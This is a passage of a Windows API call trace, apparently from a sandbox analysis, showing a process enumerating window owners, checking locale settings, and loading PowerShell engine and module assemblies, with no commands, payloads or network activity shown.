	[0513.448] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xb5c
	[0513.448] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x838
	[0513.448] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x818
	[0513.448] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x5b8
	[0513.449] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x494
	[0513.449] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1ec
	[0513.449] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x440
	[0513.449] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x7e8
	[0513.449] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x730
	[0513.449] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x2c8
	[0513.449] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x31c
	[0513.449] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x330
	[0513.449] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x128
	[0513.450] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x5c8
	[0513.450] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x6f8
	[0513.450] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x358
	[0513.450] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x73c
	[0513.450] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xb0
	[0513.450] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x250
	[0513.450] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x240
	[0513.450] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x790
	[0513.450] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x61c
	[0513.451] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x568
	[0513.451] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x538
	[0513.451] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x540
	[0513.451] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x460
	[0513.451] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x79c
	[0513.451] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4e0
	[0513.451] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x460
	[0513.451] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x778
	[0513.455] WerSetFlags () returned 0x0
	[0513.464] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0513.464] CoTaskMemFree (pv=0x0) 
	[0513.465] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1edd68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1edd60 | out: pulNumLanguages=0x1edd68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1edd60) returned 1
	[0513.465] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1edd68, pwszLanguagesBuffer=0x2ca6828, pcchLanguagesBuffer=0x1edd60 | out: pulNumLanguages=0x1edd68, pwszLanguagesBuffer=0x2ca6828, pcchLanguagesBuffer=0x1edd60) returned 1
	[0513.470] CoTaskMemAlloc (cb=0x24) returned 0x405340
	[0513.470] GetUserDefaultLocaleName (in: lpLocaleName=0x405340, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0513.471] CoTaskMemFree (pv=0x405340) 
	[0514.800] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0514.801] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.801] CoTaskMemFree (pv=0x409f00) 
	[0514.803] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0514.803] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.803] CoTaskMemFree (pv=0x409f00) 
	[0514.805] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0514.805] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.806] CoTaskMemFree (pv=0x409f00) 
	[0514.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0514.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0514.816] SetErrorMode (uMode=0x1) returned 0x1
	[0514.816] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ed9e0 | out: lpFileInformation=0x1ed9e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0514.816] SetErrorMode (uMode=0x1) returned 0x1
	[0514.816] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1edc50 | out: lpdwHandle=0x1edc50) returned 0x94c
	[0514.817] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2caa0b8 | out: lpData=0x2caa0b8) returned 1
	[0514.818] VerQueryValueW (in: pBlock=0x2caa0b8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1edbc8, puLen=0x1edbc0 | out: lplpBuffer=0x1edbc8*=0x2caa154, puLen=0x1edbc0) returned 1
	[0514.818] VerQueryValueW (in: pBlock=0x2caa0b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1edb38, puLen=0x1edb30 | out: lplpBuffer=0x1edb38*=0x2caa230, puLen=0x1edb30) returned 1
	[0514.818] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0514.818] CoTaskMemAlloc (cb=0x2e) returned 0x401540
	[0514.818] lstrcpyW (in: lpString1=0x401540, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0514.818] CoTaskMemFree (pv=0x401540) 
	[0514.818] VerQueryValueW (in: pBlock=0x2caa0b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1edb38, puLen=0x1edb30 | out: lplpBuffer=0x1edb38*=0x2caa284, puLen=0x1edb30) returned 1
	[0514.818] lstrlenW (lpString="System.Management.Automation") returned 28
	[0514.818] CoTaskMemAlloc (cb=0x3c) returned 0x408a00
	[0514.819] lstrcpyW (in: lpString1=0x408a00, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0514.819] CoTaskMemFree (pv=0x408a00) 
	[0514.819] VerQueryValueW (in: pBlock=0x2caa0b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1edb38, puLen=0x1edb30 | out: lplpBuffer=0x1edb38*=0x2caa2e0, puLen=0x1edb30) returned 1
	[0514.820] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0514.820] CoTaskMemAlloc (cb=0x20) returned 0x405400
	[0514.820] lstrcpyW (in: lpString1=0x405400, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0514.820] CoTaskMemFree (pv=0x405400) 
	[0514.820] VerQueryValueW (in: pBlock=0x2caa0b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1edb38, puLen=0x1edb30 | out: lplpBuffer=0x1edb38*=0x2caa320, puLen=0x1edb30) returned 1
	[0514.820] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0514.820] CoTaskMemAlloc (cb=0x44) returned 0x408a00
	[0514.820] lstrcpyW (in: lpString1=0x408a00, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0514.820] CoTaskMemFree (pv=0x408a00) 
	[0514.820] VerQueryValueW (in: pBlock=0x2caa0b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1edb38, puLen=0x1edb30 | out: lplpBuffer=0x1edb38*=0x2caa388, puLen=0x1edb30) returned 1
	[0514.820] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0514.820] CoTaskMemAlloc (cb=0x76) returned 0x39f9e0
	[0514.820] lstrcpyW (in: lpString1=0x39f9e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0514.820] CoTaskMemFree (pv=0x39f9e0) 
	[0514.820] VerQueryValueW (in: pBlock=0x2caa0b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1edb38, puLen=0x1edb30 | out: lplpBuffer=0x1edb38*=0x2caa424, puLen=0x1edb30) returned 1
	[0514.820] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0514.820] CoTaskMemAlloc (cb=0x44) returned 0x408a00
	[0514.820] lstrcpyW (in: lpString1=0x408a00, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0514.820] CoTaskMemFree (pv=0x408a00) 
	[0514.820] VerQueryValueW (in: pBlock=0x2caa0b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1edb38, puLen=0x1edb30 | out: lplpBuffer=0x1edb38*=0x2caa488, puLen=0x1edb30) returned 1
	[0514.821] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0514.821] CoTaskMemAlloc (cb=0x58) returned 0x387460
	[0514.821] lstrcpyW (in: lpString1=0x387460, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0514.821] CoTaskMemFree (pv=0x387460) 
	[0514.821] VerQueryValueW (in: pBlock=0x2caa0b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1edb38, puLen=0x1edb30 | out: lplpBuffer=0x1edb38*=0x2caa504, puLen=0x1edb30) returned 1
	[0514.821] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0514.821] CoTaskMemAlloc (cb=0x20) returned 0x405400
	[0514.821] lstrcpyW (in: lpString1=0x405400, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0514.821] CoTaskMemFree (pv=0x405400) 
	[0514.821] VerQueryValueW (in: pBlock=0x2caa0b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1edb38, puLen=0x1edb30 | out: lplpBuffer=0x1edb38*=0x2caa1ac, puLen=0x1edb30) returned 1
	[0514.821] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0514.821] CoTaskMemAlloc (cb=0x66) returned 0x3f7ba0
	[0514.821] lstrcpyW (in: lpString1=0x3f7ba0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0514.821] CoTaskMemFree (pv=0x3f7ba0) 
	[0514.821] VerQueryValueW (in: pBlock=0x2caa0b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1edb38, puLen=0x1edb30 | out: lplpBuffer=0x1edb38*=0x0, puLen=0x1edb30) returned 0
	[0514.821] VerQueryValueW (in: pBlock=0x2caa0b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1edb38, puLen=0x1edb30 | out: lplpBuffer=0x1edb38*=0x0, puLen=0x1edb30) returned 0
	[0514.821] VerQueryValueW (in: pBlock=0x2caa0b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1edb38, puLen=0x1edb30 | out: lplpBuffer=0x1edb38*=0x0, puLen=0x1edb30) returned 0
	[0514.821] VerQueryValueW (in: pBlock=0x2caa0b8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1edb08, puLen=0x1edb00 | out: lplpBuffer=0x1edb08*=0x2caa154, puLen=0x1edb00) returned 1
	[0514.822] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0514.822] VerLanguageNameW (in: wLang=0x0, szLang=0x3a21e0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0514.822] CoTaskMemFree (pv=0x3a21e0) 
	[0514.822] VerQueryValueW (in: pBlock=0x2caa0b8, lpSubBlock="\\", lplpBuffer=0x1edb58, puLen=0x1edb50 | out: lplpBuffer=0x1edb58*=0x2caa0e0, puLen=0x1edb50) returned 1
	[0514.833] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0514.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.833] CoTaskMemFree (pv=0x409f00) 
	[0516.807] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0516.807] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0516.807] CoTaskMemFree (pv=0x409f00) 
	[0516.812] lstrlenW (lpString="䅁") returned 1
	[0516.821] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1eda28 | out: phkResult=0x1eda28*=0x2f4) returned 0x0
	[0516.823] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1eda18 | out: phkResult=0x1eda18*=0x2f8) returned 0x0
	[0516.823] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1edaa8 | out: phkResult=0x1edaa8*=0x2fc) returned 0x0
	[0516.827] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed9ec, lpData=0x0, lpcbData=0x1ed9e8*=0x0 | out: lpType=0x1ed9ec*=0x1, lpData=0x0, lpcbData=0x1ed9e8*=0x56) returned 0x0
	[0516.828] CoTaskMemAlloc (cb=0x5a) returned 0x3f7b30
	[0516.828] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed9bc, lpData=0x3f7b30, lpcbData=0x1ed9b8*=0x56 | out: lpType=0x1ed9bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed9b8*=0x56) returned 0x0
	[0516.828] CoTaskMemFree (pv=0x3f7b30) 
	[0516.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0516.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0516.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0518.419] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0518.419] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0518.419] CoTaskMemFree (pv=0x409f00) 
	[0523.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0523.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0525.465] CoTaskMemAlloc (cb=0x104) returned 0x40a010
	[0525.465] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a010, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0525.465] CoTaskMemFree (pv=0x40a010) 
	[0525.466] CoTaskMemAlloc (cb=0x104) returned 0x40a010
	[0525.466] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a010, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0525.466] CoTaskMemFree (pv=0x40a010) 
	[0526.407] CoTaskMemAlloc (cb=0x104) returned 0x40a010
	[0526.408] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a010, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0526.408] CoTaskMemFree (pv=0x40a010) 
	[0526.409] CoTaskMemAlloc (cb=0x104) returned 0x40a010
	[0526.409] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a010, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0526.410] CoTaskMemFree (pv=0x40a010) 
	[0526.410] CoTaskMemAlloc (cb=0x104) returned 0x40a010
	[0526.410] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a010, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0526.410] CoTaskMemFree (pv=0x40a010) 
	[0529.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0529.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0529.419] CoTaskMemAlloc (cb=0x104) returned 0x40a010
	[0529.419] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a010, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0529.419] CoTaskMemFree (pv=0x40a010) 
	[0530.515] CoTaskMemAlloc (cb=0x104) returned 0x40a010
	[0530.515] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a010, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0530.515] CoTaskMemFree (pv=0x40a010) 
	[0531.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0536.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0536.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0538.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0538.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0541.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0541.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0544.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0544.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0545.142] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0545.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.142] CoTaskMemFree (pv=0x40a230) 
